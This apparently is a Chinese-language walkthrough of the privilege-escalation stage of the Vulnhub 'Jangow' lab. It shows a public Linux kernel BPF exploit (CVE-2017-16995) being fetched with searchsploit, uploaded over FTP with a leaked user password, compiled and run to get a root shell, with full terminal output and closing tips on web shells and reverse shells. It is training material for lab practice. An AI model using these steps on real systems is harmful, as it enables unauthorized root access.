Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Pri | hardware/local/48644.c
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
提权
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ searchsploit -m linux/local/45010.c
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
Codes: CVE-2017-16995
Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Vulnhub/jangow_2/45010.c
可以利用Ftp服务,将45010.c上传至靶机,靶机的/home/jangow01目录中,该目录对于jangow01用户有写入权限
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ ls
45010.c config.php linpeas.sh nmap_full_scan php-reverse-shell.php shell.php user.txt
┌──(kali㉿kali)-[~/Vulnhub/jangow_2]
└─$ ftp 192.168.56.118
Connected to 192.168.56.118.
220 (vsFTPd 3.0.3)
Name (192.168.56.118:kali): jangow01
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||14515|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Oct 31 2021 html
226 Directory send OK.
ftp> cd /home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||17105|)
150 Here comes the directory listing.
drwxr-xr-x 4 1000 1000 4096 Jun 10 2021 jangow01
226 Directory send OK.
ftp> cd jangow01
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||42434|)
150 Here comes the directory listing.
drwxr-xr-x 4 1000 1000 4096 Jun 10 2021 .
drwxr-xr-x 3 0 0 4096 Oct 31 2021 ..
-rw------- 1 1000 1000 200 Oct 31 2021 .bash_history
-rw-r--r-- 1 1000 1000 220 Jun 10 2021 .bash_logout
-rw-r--r-- 1 1000 1000 3771 Jun 10 2021 .bashrc
drwx------ 2 1000 1000 4096 Jun 10 2021 .cache
drwxrwxr-x 2 1000 1000 4096 Jun 10 2021 .nano
-rw-r--r-- 1 1000 1000 655 Jun 10 2021 .profile
-rw-r--r-- 1 1000 1000 0 Jun 10 2021 .sudo_as_admin_successful
-rw-rw-r-- 1 1000 1000 33 Jun 10 2021 user.txt
226 Directory send OK.
ftp> put 45010.c
local: 45010.c remote: 45010.c
229 Entering Extended Passive Mode (|||49878|)
150 Ok to send data.
100% |*********************************************************************************| 13176 339.61 MiB/s 00:00 ETA
226 Transfer complete.
13176 bytes sent in 00:00 (19.12 MiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||35524|)
150 Here comes the directory listing.
-rw------- 1 1000 1000 13176 Jan 01 09:28 45010.c
-rw-rw-r-- 1 1000 1000 33 Jun 10 2021 user.txt
226 Directory send OK.
ftp>
需要切换到jangow01用户,然后利用gcc 编译
www-data@jangow01:/home/jangow01$ su - jangow01
su - jangow01
Password: abygurl69
jangow01@jangow01:~$ ls
ls
45010.c exploit user.txt
jangow01@jangow01:~$ ./exploit
./exploit
-su: ./exploit: Permissão negada
jangow01@jangow01:~$ gcc 45010.c -o exploit1
gcc 45010.c -o exploit1
jangow01@jangow01:~$ ls
ls
45010.c exploit exploit1 user.txt
jangow01@jangow01:~$ ./exploit1
./exploit1
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880039f97c00
[*] Leaking sock struct from ffff88003990b680
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003bee9180
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88003bee9180
[*] credentials patched, launching shell...
# cd /root
cd /root
# ls -alh
ls -alh
total 36K
drwx------ 4 root root 4,0K Out 31 2021 .
drwxr-xr-x 24 root root 4,0K Jun 10 2021 ..
-rw------- 1 root root 3,9K Nov 3 2021 .bash_history
-rw-r--r-- 1 root root 3,1K Out 22 2015 .bashrc
drwx------ 2 root root 4,0K Out 31 2021 .cache
drwxr-xr-x 2 root root 4,0K Jun 10 2021 .nano
-rw-r--r-- 1 root root 148 Ago 17 2015 .profile
-rw-r--r-- 1 root root 2,4K Out 31 2021 proof.txt
-rw-r--r-- 1 root root 211 Jun 10 2021 .wget-hsts
# cat proof.txt
cat proof.txt
@@@&&&&&&&&&&&&&&&&&&&@@@@@@@@@@@@@@@&&&&&&&&&&&&&&
@ @@@@@@@@@@@@@@@&# #@@@@@@@@&(. /&@@@@@@@@@@
@ @@@@@@@@@@&( .@@@@@@@@&%####((//#&@@@& .&@@@@@
@ @@@@@@@& @@@@@@&@@@@@&%######%&@* ./@@* &@@
@ @@@@@* (@@@@@@@@@#/. .*@. .#&. &@@@&&
@ @@@, /@@@@@@@@#, .@. ,&, @@&&
@ @& @@@@@@@@#. @@@,@@@/ %. #, %@&
@@@# @@@@@@@@/ .@@@@@@@@@@ * ., @@
@@& @@@@@@@@* @@@@@@@@@@@ , @
@& .@@@@@@@( @@@@@@@@@@@@@@@@@@@@@ *. &@
@@/ *@@@@@@@/ @@@@@@@@@@@# @@
@@ .@@@@@@@/ @@@@@@@@@@@@@ @# @@
@@ @@@@@@@@. @@@@@@@@@@@ @@( @@
@& .@@@@@@@@. , @@@@@@@ * .@@@*( .@
@@ ,@@@@@@@@, @@@@@@@@@&*%@@@@@@@@@, @@@@@(%&* &@
@@& @@@@@@@@@@@@@@@@@ (@@@@@@@@@@@@@@%@@/ &@
@ @& ,@@@@@@@@@@@@@@@,@@@@@@@&%@@@@@@@@@@@@@@@%* &@
@ @@. .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%* &@&
@ @@@& ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%/ &@@&&
@ @@@@@@. *%@@@@@@@@@@@@@@@@@@@@&#/. &@@@@&&
@ @@@@@@@@& JANGOW &@@@
@ &&&&&&&&&@@@& @@(&@ @. %.@ @@%@ &@@@&&&&
&&&@@@@&% &/ (&&@@@&&&
(((((((((((((((((((((((((((((
da39a3ee5e6b4b0d3255bfef95601890afd80709
#
经验教训
-
在了解靶机存在命令执行漏洞时,可能无法获取反向shell,可以使用正向shell,而如果命令被靶机过滤,此时可以通过生成shell.php文件的方式,然后利用蚁剑等工具连接该文件。
-
该测试靶机过程中,攻击机Kali linux多次处于死机的状态,需要多次重启。